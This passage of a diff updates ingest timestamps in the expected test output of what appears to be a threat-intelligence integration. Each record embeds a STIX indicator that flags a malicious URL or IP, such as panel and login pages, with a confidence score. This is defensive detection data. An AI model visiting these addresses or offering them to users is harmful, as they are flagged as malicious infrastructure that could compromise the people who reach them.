"2021-12-14T14:57:43.118203092Z", "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}", "category": "threat", "type": "indicator", @@ -5456,7 +5456,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023183300Z", + "ingested": "2021-12-14T14:57:43.118203558Z", "original": "{\"created\":\"2020-01-26T02:54:41.675Z\",\"description\":\"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-26T02:54:41.675Z\",\"name\":\"mal_url: http://privatepp.club/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://privatepp.club/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.675Z\"}", "category": "threat", "type": "indicator", @@ -5507,7 +5507,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023208700Z", + "ingested": "2021-12-14T14:57:43.118203944Z", "original": "{\"created\":\"2020-01-26T02:54:41.705Z\",\"description\":\"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-26T02:54:41.705Z\",\"name\":\"mal_url: http://109.94.208.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://109.94.208.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.705Z\"}", "category": "threat", "type": "indicator", @@ -5559,7 +5559,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023213Z", + "ingested": "2021-12-14T14:57:43.118204501Z", "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}", "category": "threat", "type": "indicator", @@ -5611,7 +5611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023216400Z", + "ingested": "2021-12-14T14:57:43.118205083Z", "original": "{\"created\":\"2020-01-26T02:55:15.785Z\",\"description\":\"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--751f6e49-92d5-4ff4-9245-870a49dce478\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:15.785Z\",\"name\":\"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.785Z\"}", "category": "threat", "type": "indicator", @@ -5662,7 +5662,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023220500Z", + "ingested": "2021-12-14T14:57:43.118205513Z", "original": "{\"created\":\"2020-01-26T02:55:22.112Z\",\"description\":\"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:22.112Z\",\"name\":\"mal_url: http://pecunia110011.at/iteat/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pecunia110011.at/iteat/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:22.112Z\"}", "category": "threat", "type": "indicator", @@ -5713,7 +5713,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023224100Z", + "ingested": "2021-12-14T14:57:43.118206196Z", "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}", "category": "threat", "type": "indicator", @@ -5764,7 +5764,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023229400Z", + "ingested": "2021-12-14T14:57:43.118206631Z", "original": "{\"created\":\"2020-01-26T02:55:32.119Z\",\"description\":\"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:32.119Z\",\"name\":\"mal_url: http://jor1.berbagsansa.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.berbagsansa.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:32.119Z\"}", "category": "threat", "type": "indicator", @@ -5815,7 +5815,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023233500Z", + "ingested": "2021-12-14T14:57:43.118207029Z", "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}", "category": "threat", "type": "indicator", @@ -5866,7 +5866,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023237200Z", + "ingested": "2021-12-14T14:57:43.118207529Z", "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}", "category": "threat", "type": "indicator", @@ -5917,7 +5917,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023240600Z", + "ingested": "2021-12-14T14:57:43.118207961Z", "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}", "category": "threat", "type": "indicator", @@ -5969,7 +5969,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023244200Z", + "ingested": "2021-12-14T14:57:43.118208354Z", "original": "{\"created\":\"2020-01-26T02:55:33.738Z\",\"description\":\"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-01-26T02:55:33.738Z\",\"name\":\"mal_url: http://aboutworld.info/manage/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aboutworld.info/manage/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.738Z\"}", "category": "threat", "type": "indicator", @@ -6020,7 +6020,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023248500Z", + "ingested": "2021-12-14T14:57:43.118208760Z", "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}", "category": "threat", "type": "indicator", @@ -6071,7 +6071,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023253200Z", + "ingested": "2021-12-14T14:57:43.118209196Z", "original": "{\"created\":\"2020-01-26T02:55:33.984Z\",\"description\":\"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--274a9145-93f7-4146-a879-68fce2fc1188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:33.984Z\",\"name\":\"mal_url: http://10121.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10121.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.984Z\"}", "category": "threat", "type": "indicator", @@ -6122,7 +6122,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023257Z", + "ingested": "2021-12-14T14:57:43.118209662Z", "original": "{\"created\":\"2020-01-26T02:55:34.637Z\",\"description\":\"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--ea0abbe1-3033-4549-8ba0-626f43807986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:55:34.637Z\",\"name\":\"mal_url: http://1926.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1926.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:34.637Z\"}", "category": "threat", "type": "indicator", @@ -6167,7 +6167,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023261300Z", + "ingested": "2021-12-14T14:57:43.118210111Z", "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}", "category": "threat", "type": "indicator", @@ -6212,7 +6212,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023266Z", + "ingested": "2021-12-14T14:57:43.118210493Z", "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}", "category": "threat", "type": "indicator", @@ -6263,7 +6263,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023269800Z", + "ingested": "2021-12-14T14:57:43.118211101Z", "original": "{\"created\":\"2020-01-26T02:55:48.35Z\",\"description\":\"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime\",\"id\":\"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:48.35Z\",\"name\":\"mal_url: http://185-24-53-218.com/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185-24-53-218.com/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.35Z\"}", "category": "threat", "type": "indicator", @@ -6314,7 +6314,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023273500Z", + "ingested": "2021-12-14T14:57:43.118211544Z", "original": "{\"created\":\"2020-01-26T02:55:58.711Z\",\"description\":\"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:58.711Z\",\"name\":\"mal_url: http://1410.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1410.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:58.711Z\"}", "category": "threat", "type": "indicator", @@ -6366,7 +6366,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023278700Z", + "ingested": "2021-12-14T14:57:43.118211988Z", "original": "{\"created\":\"2020-01-26T02:56:23.739Z\",\"description\":\"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-26T02:56:23.739Z\",\"name\":\"mal_url: http://nortonlilly.info/geli/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/geli/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.739Z\"}", "category": "threat", "type": "indicator", @@ -6417,7 +6417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023286300Z", + "ingested": "2021-12-14T14:57:43.118212479Z", "original": "{\"created\":\"2020-01-26T02:56:23.79Z\",\"description\":\"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--3417c349-153d-4002-92dd-1093893f3180\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-26T02:56:23.79Z\",\"name\":\"mal_url: http://2208.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2208.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.79Z\"}", "category": "threat", "type": "indicator", @@ -6462,7 +6462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023293400Z", + "ingested": "2021-12-14T14:57:43.118212979Z", "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}", "category": "threat", "type": "indicator", @@ -6513,7 +6513,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023300500Z", + "ingested": "2021-12-14T14:57:43.118213418Z", "original": "{\"created\":\"2020-01-26T02:56:29.981Z\",\"description\":\"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:56:29.981Z\",\"name\":\"mal_url: http://1012.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1012.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:29.981Z\"}", "category": "threat", "type": "indicator", @@ -6565,7 +6565,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023307600Z", + "ingested": "2021-12-14T14:57:43.118213858Z", "original": "{\"created\":\"2020-01-26T02:56:32.609Z\",\"description\":\"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime\",\"id\":\"indicator--5049f714-5462-4f8d-8b13-d95024d477ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-26T02:56:32.609Z\",\"name\":\"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:32.609Z\"}", "category": "threat", "type": "indicator", @@ -6616,7 +6616,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023311Z", + "ingested": "2021-12-14T14:57:43.118214358Z", "original": "{\"created\":\"2020-01-26T02:56:33.504Z\",\"description\":\"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:56:33.504Z\",\"name\":\"mal_url: http://51.38.140.2/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.38.140.2/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:33.504Z\"}", "category": "threat", "type": "indicator", @@ -6667,7 +6667,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023316100Z", + "ingested": "2021-12-14T14:57:43.118217177Z", "original": "{\"created\":\"2020-01-26T02:56:37.688Z\",\"description\":\"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-26T02:56:37.688Z\",\"name\":\"mal_url: http://baxarex228.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://baxarex228.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:37.688Z\"}", "category": "threat", "type": "indicator", @@ -6712,7 +6712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023319900Z", + "ingested": "2021-12-14T14:57:43.118217808Z", "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}", "category": "threat", "type": "indicator", @@ -6757,7 +6757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023323600Z", + "ingested": "2021-12-14T14:57:43.118218237Z", "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}", "category": "threat", "type": "indicator", @@ -6802,7 +6802,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023329200Z", + "ingested": "2021-12-14T14:57:43.118218650Z", "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}", "category": "threat", "type": "indicator", @@ -6853,7 +6853,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023334600Z", + "ingested": "2021-12-14T14:57:43.118219038Z", "original": "{\"created\":\"2020-01-26T02:56:49.93Z\",\"description\":\"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-26T02:56:49.93Z\",\"name\":\"mal_url: http://0409.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0409.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.93Z\"}", "category": "threat", "type": "indicator", @@ -6904,7 +6904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023358400Z", + "ingested": "2021-12-14T14:57:43.118219424Z", "original": "{\"created\":\"2020-01-26T02:57:03.544Z\",\"description\":\"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--96012440-e95d-46f0-9b70-3f495f4bab32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:57:03.544Z\",\"name\":\"mal_url: http://jor1.mirtakala.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.mirtakala.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:03.544Z\"}", "category": "threat", "type": "indicator", @@ -6955,7 +6955,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023362100Z", + "ingested": "2021-12-14T14:57:43.118219874Z", "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", "category": "threat", "type": "indicator", @@ -7007,7 +7007,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023365700Z", + "ingested": "2021-12-14T14:57:43.118220294Z", "original": "{\"created\":\"2020-01-26T02:57:10.571Z\",\"description\":\"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-26T02:57:10.571Z\",\"name\":\"mal_url: http://pnumbrero3.ru/soft/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.571Z\"}", "category": "threat", "type": "indicator", @@ -7058,7 +7058,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023369700Z", + "ingested": "2021-12-14T14:57:43.118220681Z", "original": "{\"created\":\"2020-01-26T02:57:14.057Z\",\"description\":\"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--b449e457-5327-40a2-8bda-0167c219490c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:14.057Z\",\"name\":\"mal_url: http://10122.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10122.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:14.057Z\"}", "category": "threat", "type": "indicator", @@ -7109,7 +7109,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023374700Z", + "ingested": "2021-12-14T14:57:43.118221070Z", "original": "{\"created\":\"2020-01-26T02:57:26.003Z\",\"description\":\"TS ID: 55256890125; iType: 